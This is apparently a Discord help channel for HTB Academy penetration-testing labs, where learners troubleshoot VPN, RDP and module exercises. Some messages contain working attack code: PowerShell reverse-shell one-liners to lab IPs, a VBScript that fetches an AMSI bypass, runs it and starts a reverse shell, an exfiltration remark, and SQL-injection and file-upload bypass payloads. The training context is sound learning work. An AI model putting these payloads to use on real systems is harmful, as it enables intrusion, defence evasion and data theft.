I'd recommend the easy route and using burp's built in browser, no setup required.
quick question, when the modules have time like 7 days, does it equate to 7*24 or how many hours does that module usually take ?
hey guys, i need some help, i cannot seem to deploy a shell by exploiting through metasploit or manually, i have been trying for a while i am following every step and double checking all the configurations set on metasploit or the manual execution.
can someone tell me possible reasons that could happen ?
should i use a different vpn file ?
im using the eu 1 file if i remember correctly, i am in india though, does that affect in anyway
i am still getting exploit completed but no session was created
i cant even seem to find a workaround
update metasploit works fine on pwnbox
used that to get on with the module
i guess its my network setting on my vm i gotta see what i can do to fix it
It is 8 hours per day
But it usually takes twice or more to cover the module than suggested there
mind if i dmed you please?
Bro why is HTB releasing so many good Tier IV modules when im so broke
please release more Tier III or something I beg 🙏
why there is no option to connect via openvpn?
the instance is probably a public ip and won't require a vpn
Sure, go ahead.
Anybody know where I can get the tagged boxes lists mentioned here?
Afternoon folks, struggling here with the end of AEN - can't get meterpreter to catch the reverse shell from the double pivot. Driving me up the wall tbh.
Ah man, I wanna help but haven't done that module. I would just type ||cmd.exe|| and check what happens
It used to work but when i restarted the machine it stopped working for some reason
@leaden island Please take care not to post content from modules above tier 0
Re-read the section that explains what to do, you're not doing it correctly
Ah sry gotcha
Doing Logrotate section within Linux Privilege Escalation module, feel like i'm doing something wrong though, unless logrotate actually only runs once an hour and I just have to wait for potentially an hour to get the flag? Not really used to that for Academy sections though
no you don't have to wait an hour, you trigger it
i think that vuln is very finicky and it'll only work once, or for a short amount of time, so you have to reset
footprinting module, Lab easy. There I need to enum a DNS server
tried triggering it with ||logrotate -f -s /tmp/logrotate.status /etc/logrotate.d/mon|| but I think it executes as htb-student then since it doesn't write the payload to bash_completion.d
also don't get a connection to my listener when I do this ^
i love how in one section of the mssql/sccm module they teach you to use ligolo-ng for tunneling, but in the dedicated tunneling/pivoting module there's not even a mention 🙁
I'm pretty sure there's a backup directory that you should use for this lab. In the home directory I believe.
Do you still need help?
Did you figure it out?
Hi, in the "Attacking Authentication Mechanisms" module I am trying to access the vHosts to complete the exercise. But the hostnames are not resolving like academy.htb and sso.htb, anybody know how to do it?
Have you added them to the /etc/hosts file?
aaaahhh. It's working now thanks
file transfer module, on section 8
i believe it should be "upload to target"
oh, thanks
Unable to connect via RDP as mention in the question
any help?
Section3 Q2: attack&defense
confirm u can reach the machine with ping
Nope!
however other Windows machine is connected (10.) via RDP.
in that machine, used echo %LOGONSERVER%, there DC2 was mentioned instead of DC1
Figured it out! thx
Stuck in Windows Privilege Escalation Skills Assessment - Part II
can someone help
Feel free to DM me and i'll try and help.
Hey guys, can i ping someone for Introduction to NoSQLi injection module
Managed to figure it out! Thanks anyways though!!
Brother, it's been a long time but I kept some notes, might be able to help
Thanks for the help

Is the mdk4 tool not available in the module Attacking Wi-Fi protected setup, in the "Attacking Wi-Fi Protected Setup - Skills Assessment" section? It's the last one. I need to use it. Is it possible to download additional tools on the machine?
I bought a tier 3 module a week ago, but i haven't used it, & I'm not planning on using it either. Can i refund it for 500 cubes?
hi
Aight' thanks
Yes, i was putting the path in the wrong field
Hello, please, can you tell me why i can't RDP to https://academy.hackthebox.com/app/module/253/section/2811 :
RDP to 10.129.121.40 (ACADEMY-ADTRUST-CFSQL01), with user "Administrator" and password "HTB_@cademy_adm!"
I changed my VPN, rebooted the box. But the rdp isn't possible.
Establish an SSH dynamic portforwarding first
But first i want to rdp to 10.129.121.40 before the pivot
i don't even need to pivot if i'm RDP to this IP
The AD Trust module is very unstable
refer to https://academy.hackthebox.com/app/module/253/section/2809 (Lab Setup)
Sorry, I forgot, it's my fault, many thanks 
I'm on the LFI skills assessment and what I did should have worked, but it didn't, and I even cross-checked it to a walkthrough. I don't know what to do
how did you proceed
Leverage sharpview with sliver.
DM please
Hello, is the openvpn for academy changed because i can't find it.
The VPN file is only available where it is needed
@acoustic owl Yes i know that but i don't see it for this module Active Directory Enumeration & Attacks
Ok nvm i see now. Thanks
Hello
excuse me
for the introduction to sql injection, should i restrain myself from using sqlmap?
Yes it’s supposed to teach you how to manually do sql injection
there is a separate module for sqlmap
Okay okay
hmmmm
Adding on that, it's good to learn how to do stuff manually without full automation anyways.
For example, you could enter a big bounty that pays well but they want you to identify vulnerabilities manually.
haha i was doing it manually for 3 days that's why
but turned out i made a stupid assumption
it's too easy
i made an assumption because i thought -- won't work
because i forgot ) exists (later discovery, i didn't know it existed but i tried to use comment and i thought comment was filtered in the application)
Hi, I want to ask that are there any mentor of the modules in the penetration test?
feel free to ask questions and someone will answer them
thank you very much
help i was doing the windows fundamentals module i run pwn box connect to windows rdp and now i have to do some wmi commands but on windows rdp only recycle bin showing
That’s normal on HTB Windows targets sometimes. You’re likely logged into a minimal desktop session. Use CMD and Powershell. The shell will work just fine
on linux shell ?
No, on windows
Press the windows symbol and search for powershell or CMD
worked thanks
o/
What is the alias set for the ipconfig.exe command?
i been putting ipconfig but its a wrong answer
what should i do
host unreachable ? what do i do?
Read the section again
Are you connected to the right VPN?
yes
can you see tun0 IP using ip a
yes
ok let me try that
Hello 😁
I have a problem
I‘m completely new to HTB. I started the first modules and everything worked.
Now I‘m on the linux module (Tier 0) and the target is not loading.
„Target(s)
Time left: 118min(s)
10.129.120.xxx“
(Im doing it with my iphone - safari browser)
bruhh
You intend to complete the module on a phone?
Looks like it loaded though
Yes 😅 most of the time i‘m not at my pc so I have to do such stuff on my phone.
how are you gonna complete a challenge on ur phone
I respect your dedication. You can read the articles and take notes on phone. But I'd prefer doing the labs on PC
so the ip is local which means you would need a vpn to connect to that ip have you done that?
imo better option would be to just do in your pc but if you really cant then just use pwnbox and rotate your phone to make it act like a pc
pwnbox is also auto connected to whatever network you need to be on to access that ip
does the pwnbox really function on a phone?
u can use it if as desktop if u rotate but i dunno how typing works but i guess u can ssh into it using the web terminal
oh ok
Huh... I guess that's a way of getting it done
Has anyone done the Using CrackMapExec Module who can give me a pointer on the Skills Assessment section? I'm stuck on Q2: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt. So far, I've || got juliette's password and have used that against the MSSQL service on SQL01 and then escalated privileges to SYSADMIN but I can't seem to execute commands to reveal the flag? ||. Thanks.
dm please
Small question in the Introduction to Networking module Section 2,
It says here that both the client and the server are networking devices and uses Firewalls as an example but I thought that firewalls are just the security systems that monitor inbound and outbound traffic, is there also a device called firewall? can't seem to find it on google
physical firewall devices do exist
What are they? routers with firewall configurations?
hello guys
they are specialized devices for firewall configuration; https://www.sophos.com/en-us/cybersecurity-explained/firewall
A firewall is a network security device that monitors and filters incoming and outgoing network traffic based on an organization's previously established security rules. At its most basic, a firewall essentially functions as a barrier between a trusted internal network and an untrusted external network, such as the internet.
Got it, thanks
i need help establishing a reverse shell in a windows RDP environment
Exactly which module is this? Can you copy a link?
the payloads module its a tier one module
it gives a script you can copy but in my instance its not working
and in later examples its kind of vague
also this might just be because i had to install xfreerdp and xquartz with homebrew to run it but the +clipboard addon isnt working its inconsistent
when i try to copy paste into the windows environment it sometimes works and sometimes doesnt
i dont know if its xquartz or the brew rdp proxy
xfreerdp is what is recommended, and there is a comment there about pasting from Pwnbox into notepad, so obviously others have had issues too through xfreerdp. I'm afraid past what it recommends in the section, I do not have any other suggestions. Perhaps someone else will comment with their experience 🙂
the section recommends powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()” as a payload
but this simply doesnt work
and not because of AV settings like it assumes
Do you get any output?
errors
syntax errors
meaning the payload itself isnt parsing
also i figured out the clipboard issue
the +clipboard lets you copy your clipboard over like one time for some reason, you just have to restart quartz and xfreerdp each time
It's interpreting the $ variables as being referenced, resulting in a corrupt payload
; = .GetStream(); it's missing ;$stream
that makes sense
i looked at the errors further
i encased it in quotes and it fixed most of the issues
Yeah, the double quotes in the example in the section are required. Also, different commandline interpreters interpret variables differently.. e.g. command prompt vs powershell (command prompt is mentioned specifically there..)
the double quotes alone werent enough i added more
im using powershell since cmd will likely react worse
i dont have experience with either so i dont really know the differences
i got the two confused
i thought it said to use powershell
let me try that
same errors it says a lot of the variables being called on are deprecated
i got somewhere
Great.
Just spun this up and didn't have any issues using Kali VM.
$client = New-Object System.Net.Sockets.TCPClient(’10.10.15.225’,7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
this one worked
i didnt try with my kali vm i wanted to try with mac but im using xquartz/xfreerdp for the remote host and installed all the tools with homebrew
my first issue was that i was running a cmd command in powershell then i looked in cmd and realized that the cmd command kind of sucked and was overcomplicated and was running a powershell command anyways so i just took the raw command and pasted it into powershell
i dont know jack about windows only experience is using regedit and using it when i was younger
Guys, can anyone offer some advice? I’ve been trying to complete the ‘Kobold’ CTF. I spent 5 (out of 7) hours looking for the root flag, eventually gave up and looked at the solution (I didn’t submit the root flag, as that would have been unfair), and was really disappointed — I even wondered if I’d been thinking along the wrong lines or something like that… :/ Can anyone offer any advice on CTFs? I thought that after the initial stage I’d try my hand at seasonal competitions, but now I’m lying in bed, and I feel like I’ve dropped out of life
you should ask it in #boxes btw
I thought it’s more theory-oriented question, isn’t it?
Ok, sorry anyway
introduction to bash scripting 3 script control---flow control loops guys i am having a issue in this question of Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
you dont need -w 0
@peak forge STILL NOT WORKING
you should count the words after the loop
the chars i mean
echo your var, see what it contains, that way you will know what needs to happen
by putting in into a if else statment ??
(spoiler || you are missing the WordCount command || )
nope
so far, you are encoding into base64, and assigning that into salt
you are missing wc
this is more of a programming skill
true
dm me so we dont fill this entire chat
i have known java and sql well but i did that years ago soo i am a bit rusty
Anyone done Wi-Fi Penetration Testing Basics - Skills Assessment under the Wi-Fi Penetration Testing Basics module? I'm having issues trying to connect to the Wi-Fi.
I got it.
If anyone needs help with this module, feel free to ping/PM me.
that module is above tier 0; please don't share code
mb sorry
Is the File Upload Attacks module's Whitelist Filters section broken? I've done the script suggested and added '.phar' '.phtml' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phpt' '.pgif' '.phtml' '.phtm' to the extensions, done it for jpg, jpeg, png, as well alternating the extension and escape characters. Also tried reading the old forums getting basically the exact solution some people used to generate the file names as well.
I get 403s for the ones that were supposed to have worked, and 404's for ones that didn't work. Using ffuf for the post and get because intruder is obnoxiously slow. Tried using -raw flag for ffuf and without as well
any vpn issues?
i think so, i cant do any exercise
I try to switch between TCP <--> UDP and all region (US and EU) seems no luck
Same here, issues with VPN. Even the pw box cannot can VPN IP
it seems to be down, i reinstalled the ovpn file to see if it was my fault but it doesnt
Same, VPN is down.
same here
@jolly cradle
im glad the issue wasnt on my end
Are you guys on US VPN Server?
Both US and EU are down (Either TCP or UDP)
im on EU
Ah I thought it was me, it says no VPN or tun0 from the pwnbox and also no route from the pwnbox to the VM (EU)
neither labs nor academy work
Yup, EU is down as well
hackthebox tweaking
for the optional exercise for filtering fuzzing output in web fuzzing module, there's one question and I got the value of the parameter but its not accepting it in the URL. I know I have the right wordlist and I think I actually have the right value. I don't want to post the URL here because its a spoiler. can I DM what I have and someone can tell me what I'm not getting?
I want to get this flag and take notes on the section before doing the next one even if its an optional section
I mean the flag is optional so I could just mark it as complete but I don't want to do that
I want to know I know it
can someone DM me?
sure
sorry this might have been asked already but I had unlocked a bunch of Modules on HTB Academy and now I am locked out of them? Do I have to use cubes again to unlock them?
I am not paying for a subscription atm but the modules were unlocked when I had the Silver Subscription, now I have modules half done and half locked 😂
You either need to get back your silver sub or buy them back with cubes, the only modules you keep access on are finished ones.
I see but that does not seem completely correct, I have others that I started during the Silver Sub and are still available and not completed
the ones locked are a bit arbitrary
like I have "ADCS Attacks" available to complete, yet the "Intro To Assembly" is locked
I definitely did not use cubes for "Information Gathering - Web Edition" or "Password Attacks" either... but again maybe these specific ones were unlocked with CPTS or CBBH and then updated later so I still have access to them?
oh well whatever
any module that you completed fully then was updated is still yours to access, yes they both received updates (a while ago)
yes I now understand, thank you for that
Hello,
I'm new to HTB and currently working through the Vulnerability Assessment course (Section 12/17 – Nessus Scanner).
I opened the Pwnbox to complete the questions, and I'm trying to access the Nessus URL, but I'm not sure if https://127.0.0.1:8834 is supposed to open the Nessus UI.
At the moment, https://127.0.0.1:8834 is not opening anything for me, so I wanted to check if this is the correct URL or if I'm missing any setup/configuration steps.
Thanks!
well.. that's localhost, the target spawn will have it on the relevant port
https://target_ip:8834 <-
thank you
Hello
I have a question regarding one of the questions in the CDSA Path
Incident Handling Process >> Detection & Analysis Stage (Part 1) >> Q2
I can't find the suitable answer pattern whatever I tried
||TECHRANGE\administrator||
||"TECHRANGE\administrator"||
||"TECHRANGE\administrator."||
is that my answer is wrong or the pattern is wrong
windows fundamentals what is serial number of the system answer keep getting wrong
I think I found a grammatical error in one of the modules.
Can someone give me a nudge on Whitelist filters in the file upload attacks module? the payloads I've used alternate between '.phar' '.phtml' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phpt' '.pgif' '.phtml' '.phtm' to the extensions, .png .jpeg and .jpg, and all the character extensions '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':' '.' '\x00
outputting the resulting wordlist with this
echo "hack$char$ext$img" >> wordlist.txt
echo "hack$char$img$ext" >> wordlist.txt
echo "hack$ext$char$img" >> wordlist.txt
echo "hack$ext$img$char" >> wordlist.txt
echo "hack$img$char$ext" >> wordlist.txt
echo "hack$img$ext$char" >> wordlist.txt
echo "hack$ext$img" >> wordlist.txt
echo "hack$img$ext" >> wordlist.txt
All of the solutions online don't work, and this script is even more verbose than the solutions i've found online. I've been on it for daaayyys
The line if ip <>"1.2.3.4" then checks if the remote ip is 1.2.3.4, if not it will show a 404 Page Not Found.
omg I'm dumb
I'm working on https://academy.hackthebox.com/app/module/134/section/1175
The module mentions that using curl -i -X OPTIONS http://<IP>:<PORT> should give you the allowed HTTP methods in the Allow header in the response. However, I don't get the Allow header and instead get this:
HTTP/1.1 200 OK
Date: Thu, 21 May 2026 18:48:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1075
Content-Type: text/html; charset=UTF-8
Is that curl the right command?
options isn't enabled on that server
please delete bc spoilers for module above tier 0
wait, why is it not enabled on that server if the server is the target machine for the exercise? the page itself even guides through saying try the curl command on the target machine to see the Allow headers
because it's just not
i'm not staff so i can't tell you why they chose to do it that way
but not every practice environment will be 100% with what you read
trying pentest in a nutshell I know that the msfconsole thing doesn't work every time but it's not worked once for me and I can't figure out why. I think I have done everything right
edit: nvm I got it working using the machine on HTB
for the optional exercise in the filtering fuzzing output section of Web Fuzzing module, I got the fuzzer to get me the post parameter but when I go to the webpage it says incorrect parameter of y
I am confident I used the right wordlist and that the fuzzer worked
can someone help me with this?
anyone available for a DM?
are pwnbox instances currently at its capacity limits?
If you mean the option to connect doesn't show on every section any more, that's because it only shows on sections which require a VPN connection now 🙂
The option to spawn the Pwnbox will still display on interactive sections which do not require a VPN however, if you want to use the Pwnbox.
that makes sense. thank you for the clarification
Any advice on how to get around this or reset it or....?
I'm working on: https://academy.hackthebox.com/app/module/33/section/216
I'm at the question:
Use a Union injection to get the result of 'user()'
I'm passing into the searchbox:
|| ' UNION SELECT 1, user(), 3, 4-- -||
However, it's just returning
you have an error in your sql syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1.
Not sure what I'm doing wrong here, can someone help?
I'm taking a look now to see if I can refresh my memory
Works for me. ¯_(ツ)_/¯
i'm guessing you goofed your last attempt with a misplaced character, but what you posted here works perfectly fine.
I don't think that matters. I literally copied and pasted your example and it worked for me.
but i'm happy to hear you figured it out. Sometimes plugging dozens of attempts in to test gets hairy. I like to copy each attempt into a new line in notepad/mousepad so I can keep track of my iterations. It helps, but when you're doing it over and over you just make weird mistakes. My only guess at what happened.
maybe, yea. thanks though!
I hope you're not from a country where the thumbs up is offensive. Is there a universal "you got this" symbol that's not risking an international incident?
lol im from the east coast US, its fine
If you are still stuck on this you can DM as it's just easier with this type of section.
dns.resolver.LifetimeTimeout: The resolution lifetime expired after 3.104 seconds: Server Do53:10.129.3.17@53 answered The DNS operation timed out.
Can someone help please. It is happening python bloodhound on linux. My /etc/hosts file domains targets all correct
Command I am using:
sudo bloodhound-python -d inlanefreight.htb -c All -u htb-student -p HTBRocks! -ns 10.129.3.17 -k
curl using ur value , you already fuzzed it
i sent hint in dm
any issues with academy VPN to eu? or just me?
Did you pass Q1? Im stuck, machine looks bare naked, no hydra or wordlists. I obviously miss some easy solution.
Those rdp connections are absolute fucking shit, cannot complete the task cause I cannot fucking connect to the rdp from various machines: SNIP:
[11:26:16:199] [7681:00001e01] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /from-stdin pass the credential via stdin
[11:26:16:199] [7681:00001e01] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - set environment variable FREERDP_ASKPASS to have a gui tool query for credentials
[11:26:16:206] [7681:00001e03] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[11:26:16:206] [7681:00001e03] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: ZEHA: keycode: 0x5d -> no RDP scancode found
[11:26:17:004] [7681:00001e03] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:26:17:004] [7681:00001e03] [WARN][com.freerdp.crypto] - [verify_cb]: CN = DESKTOP-NU10MTO
[11:26:17:005] [7681:00001e03] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[11:26:17:005] [7681:00001e03] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core] - [nla_recv_pdu]: ERRCONNECT_LOGON_FAILURE [0x00020014]
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x55581d73f060]: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x55581d73f060]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1]
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
SNIP
Even in the PwnBox, it is still failing to connect
How the fuck am I supposed to complete the task if I cannot connect to the fucking machine for two days
Module is "Windows Event Logs & Finding Evil"
Fix this module!
What is the command you are using, from which terminal (e.g. bash, cmd, etc)? I just tried it, and I can connect perfectly fine with the documented xfreerdp command @fallen arrow
xfreerdp /v:MachineIP /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /dynamic-resolution
And what type of terminal are you running that command from?
I am currently testing from the pwnbox which uses parrot terminal
Ok so bash or powershell, I've verified it's working here on both on the Pwnbox
bash
That's bash
True
I have restarted the machine, and maybe on the fifth new ip it worked now
But the problem is, it disconnects after like 1 minute
of running
If it disconnects repeatedly, you must have another VPN client trying to connect, which makes it fight for the session
Make sure you kill all other possible vpn clients you may have started elsewhere
has anyone had this issue before? when rdping to a lab box i get this:
Also check this article for some suggestions that have helped others that experience issues with RDP connections https://help.hackthebox.com/en/articles/12710285-connecting-to-academy-vpn#h_5a2b5ed58c
Mullvad is turned off on host
I mean any other openvpn clients using the same ovpn config file, multiple clients trying to connect with the same config will cause each other to repeatedly disconnect and reconnect
https://help.hackthebox.com/en/articles/12710285-connecting-to-academy-vpn
Try changing to tcp per pwnbox instructions here
Check your VPN log on the Pwnbox, see if it is repeatedly disconnecting and reconnecting over and over
or yeah, try switching to TCP, and checking the other steps that have helped others with RDP connections in the above article we shared
Does it matter if the vpn tcp or udp files are old?
Because I have access to the target, it's just the rdp that is messing with me
Can you check the VPN logs and see what is output when you notice the connection dropping first please?
Before we start worrying with updating the VPN from UDP to TCP (which shouldn't really be needed if you're using the Pwnbox), let's see if there is an issue shown in the logs
So, I tested, and it doesn't wanna work on my Kali machine, both with udp and tcp. On pwnbox, it works but not from first time
I'd suggest reaching out to support, I'm trying to help but I'm not getting the information I need to help you, so yeah, support will be the people to speak to
Alright, thanks
I'm doing the Attacking Common Web Applications module, specifically the Attacking Wordpress section (4), and I'm supposed to be able to access the theme name under /wp-content/themes/<theme name>, but it only works for 1 theme (transport-gravity), in the walkthrough it uses twentynineteen, but all the others also don't work. I just get a "This page isn't working" response. Also if I go to the parent directory, so just /wp-content/themes, it's just a white page without any content. I am supposed to put a web shell under the 404.php page, but I cannot access it, even for the only theme that I can access under /wp-content/themes/transport-gravity (curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php -> no response). What am I missing?
Hey all! I don't wanna post spoilers. I'm working on the Attack Enterprise Networks module, but stuck on gaining privilege escalation for the DDN. Has anyone finished this module yet?
if you are trying to do it blind, take breaks and try again later, if not, the module itself explains how to do it
100%. Will try to go through it more slowly. I've been stuck on it for the past few days. I can get half way, but can't achieve PE.
its possible you are missing important enumeration steps, if its local privesc, check again hack the box module for that, go through each enumeration step and see what exactly your current user can do
Gonna do that, thanks!
usually service accounts have the same privesc steps, if your user cant do much, make sure to properly enumerate the files in the host, for creds and stuff like that
the idea of doing it blind is to simulate the exam, you wont be able to ask for hints during cpts, so learn to keep calm and retrace steps
Probably doesn't help that I haven't done Windows Privilege Escalation module yet lol
oh....... for sure
you shouldnt have skipped that one
Gonna start it now, appreciate the chat! ❤️
What is the password mcharles uses for OneDrive?
for the Password Attacks Module - Credential Hunting in network shares, Snaffler's output is too messy to read. How do I clean it up / make sense of it?
Yes! I couldn't get colors or better formatting natively. But here's my cheat:
If you're working through a shell, recommend combining Snaffler with SnafflerParser (link to raw script, curl it) so you can take the output and transfer to a Windows system then parse the output for clearer reading (I can't figure out a better way to get colors out of snaffler when running through a webshell or meterpreter).
Thank you it looks good. i've checked the README briefly
my attacker machine is a linux machine, how would you recommend I go about using this?
Explorer ++ is also required based on the Usage section
Honestly I don't remember anything beyond the same problem you mentioned and my notes for a solution. I could have transferred the results to a windows VM hosted locally on my system.
anyone?
DM?
I am currently working through HTB Academy Linux Privilege Escalation and embarrassingly I cannot find the latest python version?
I found all packages installed, tried the version numbers, package version, executable version id (python3.xx) and so forth but nothing is being accepted
multiple python versions may be installed 😉
Just to confirm, I found 6 python versions including minimals
I feel like for a Tier 2, I could possibly be overthinking
... yeah nvm I definitely over thought, for anyone in the future, you do not need the patch number included
Module: Introduction to Windows Evasion Techniques
Section: Skills Assessment II
Question: Your task is to develop a VBScript payload. Once ready, place the .vbs file inside C:\Alpha\SA2 and wait up to a minute for the victim to run their checks, and then execute the file. The command your payload will be executed with is: 'C:\Windows\System32\wscript.exe <YOUR FILE>'. One thing you should keep in mind is that Windows Script Host (wscript.exe) makes use of AMSI.
Hey :). I managed to modify the provided VBA script template to download an AMSI bypass script (powershell) from my linux host and execute it, then, the VBA script immediately executes a reverse shell executable which is not detected by Defender (the one from dynamic analysis section).
Here's the script:
Dim objShell
Set objShell = CreateObject("WScript.Shell")
dim psCmd
psCmd = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ""(New-Object Net.WebClient).DownloadString('http://10.10.14.27/amsi-bypass2.ps1')|IEX; C:\windows\tasks\revshell.exe"""
objShell.Run psCmd, 0, True
Set objShell = Nothing
If I execute the specified command (C:\Windows\System32\wscript.exe C:\windows\tasks\revshell.exe), it does work just fine and I receive the shell as the user I'm already logged in. However, if I place the VBA script in the specified folder, the automated user seems to execute the script but I don't receive the revshell. The log file keeps saying Timeout reached, killing process.
Any help is appreciated.
Howdy!
I'm having trouble with the Password Attacks – Skills Assessment. As soon as I SSH into DMZ01 (1st target), the connection freezes after ~10 seconds and I'm unable to run any further commands — the terminal just hangs with no error message.
My setup:
- Kali Linux (virtualized on a Mac M3)
- Connected via VPN with a stable connection
I've already tried respawning the machine, but the issue persists. Has anyone else run into this? Any tips would be appreciated!
Is anyone having problems with Nessus Skills Assessments?
Hi, I’m having an issue with the API model training course. When I try to visit the machine IP address, it does not work or load properly. Could you please help me check and resolve the issue?
Nvm, I ended up exfiltrating the flag as an HTTP request to my attacker machine. Couldn't get a reverse shell. Btw; Seems like (New-Object Net.WebClient)... is blocked but Invoke-RestMethod is not...
Hi guys, I am solving Shells & Payload's live engagement. I am trying to exploit Host 3 (lab.inlanefreight.local), but Host 3 is unreachable. I have been trying for a whole day, yet no luck. I am attaching the screenshot of the host file and the error page in the foothold machine. Also, I have tried to access non-HTTPS, but it is redirecting me to HTTPS even after turning off the HTTPS Everywhere plugin. Also, I have used curl to get a webpage, but curl cannot reach it
Please, please, please, help me out here!! Thank you!!
Sounds like a network problem
BTW now that i see it, shouldn't you include the main domain on /etc/hosts?
I've always done it like that, inlanefreight.local lab.inlanefreight.local
can you ping the ip? if not maybe respawn the target. if that doesn't work killall -9 openvpn, then redownload the vpn file and use that one to connect. also make sure you aren't connected to the VPN while having spawned the Pwnbox at the same time.
doesn't really matter as they're using the IP anyway
I am afraid, I can't ping the ip. And I have also launched the instance multiple times. I have followed your instruction, download a new vpn file, connected it via openvpn, accessed the foothold pc via RDP, but still cannot access the lab.inlanefreight.local using the foothold pc.
It's a network problem
are you using the pwnbox or a vpn
or have you also spawned the pwnbox?
don't recall lab.inlanefreight.local being part of that assessment
i also see you're using https; most of the internal stuff uses http, not https -- but again it's been a minute. mind linking the section so i can double check the engagement text?
Remove https
Use http
You are supposed to RDP into the foothold, which it looks like you did as I can see htb-student@skills-foothold. From the foothold you should be targeting the other hosts.
Okay finally I figured it out, why does the file upload AND access work with uploading manually in the UI or with CURL but not when that exact same filename is in a script and fuzzed with FFUF using the exact request as cURL? Even though the successful filename in the generated wordlist appears multiple times, it doesn't seem to actually upload. Is it a problem with FFUF or the server getting slammed too quickly and not actually uploading anything?
Like literally nothing was actually uploaded, because when I do cmd=ls it doesn't show any thing I actually uploaded even though they all returned 200
Hi all, I'm on the "Drupal - Discovery & Enumeration section" of the attacking common application module.
The question asks us to find the version of drupal, so i run the droopescan scan drupal -u http://drupal-qa.inlanefreight.local
But, half way through the scan, it will shows remote connection error
I have restarted the target, still same. I also add -t 2 to reduce the threads of the scan, still get the error.
Anyone have idea how to solve this?
No, I haven't spawn the pwnbox. I am using Open VPN in my windows. I have been able to exploit the other two hosts, but can't even access the 3rd host.
open vpn in windows while running a kali vm? try running the vpn on the vm instead of your host
I launched the Kali VM later, but even when it wasn't running I couldn’t access the 3rd host via RDP.
Well, I tried to access it with HTTP, but I am getting redirected to HTTPS version, so I turned off the HTTPS everywhere, but still no luck. Then, I used curl to fetch the site directly, still no luck. Can't even ping it.
Okay, let me try this
Thank you!!!
if that doesn't work, restart your whole PC, fire up the VM, within the VM delete the existing VPN file, change regions, use tcp vpn, and then connect to it and try
sent a FR
host 3 yeah? nothing i'm remembering says that it needs to be interacted with via http
doing the password attack module on htb i can't find the vpn file to download
if the section requires it it'll be a tab next to the pwnbox; some of the sections are against public containers (ip:port) and don't require the vpn
ssh has a method for you to specify the port, -p
well interesting i guess i need to find my way around this module
thanks
but i still somehow feel there should be a vpn file here because i try to search other modules to find one i can't ...it's like all of them disappeared
as stated, if the section requires it, you should be given the option -- quick shorthand to remember if it does:
10.129.x.x -> vpn required
ip:port -> vpn not required
yap 10.129 ... i was correct vpn required
and its not giving me an options to download one
module is password attacks
link the section
you also don't need a new vpn for each section, just one for all of academy
for pivoting module, RDP and SOCKS Tunneling with SocksOverRDP, where am i even supposed to get the dll mentioned in the course
Hey looking for a nudge on the following module, I've tried the attack from Windows and Linux but in both cases I get the same errors, I must be missing something...
Module: Active Directory Trust Attacks
Section: Skills Assessment
Question: Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt"
I tried all of that, but still nothing. So, I first rebooted my pc, then turned on the VM. From the VM Kali Linux, I used xfreerdp to log in to the foothold pc, I tried accessing lab.inlanefreight.local, but it redirects me to the https version, so I stopped HTTPS everywhere extension, tried again, still unreachable. So, I tried pinging the host-3, but the port is unreachable.
Then I tried using the foothold PC via SSH; the same issue persists there too. Host 3 is unreachable.
and this is password cracking module in cpts
because I've changed my network 4 times and it's still not showing the vpn
for those who struggles in windows evasion SA 2 use this repo https://github.com/bitsadmin/revbshell
was having trouble this morning connecting to anything for the smtp footprinting module via vpn file, doing it on pwnbox worked
it has been fixed thanks htb
Also stuck here, can I DM?
Scan the third host, I believe you're just doing something fundamentally wrong/misunderstanding what youre meant to do
Host 3 isnt a 10.129.x.x host
To be clear this is the shells/payloads assessment yeah?
I have also seen in writeups that the third host's ip is always something like this: 172.16.1.13, but I am confused why the third host's ip is 10.129.201.134
Yes, you r right
Its not, the engagement explicitly tells you what the third host is
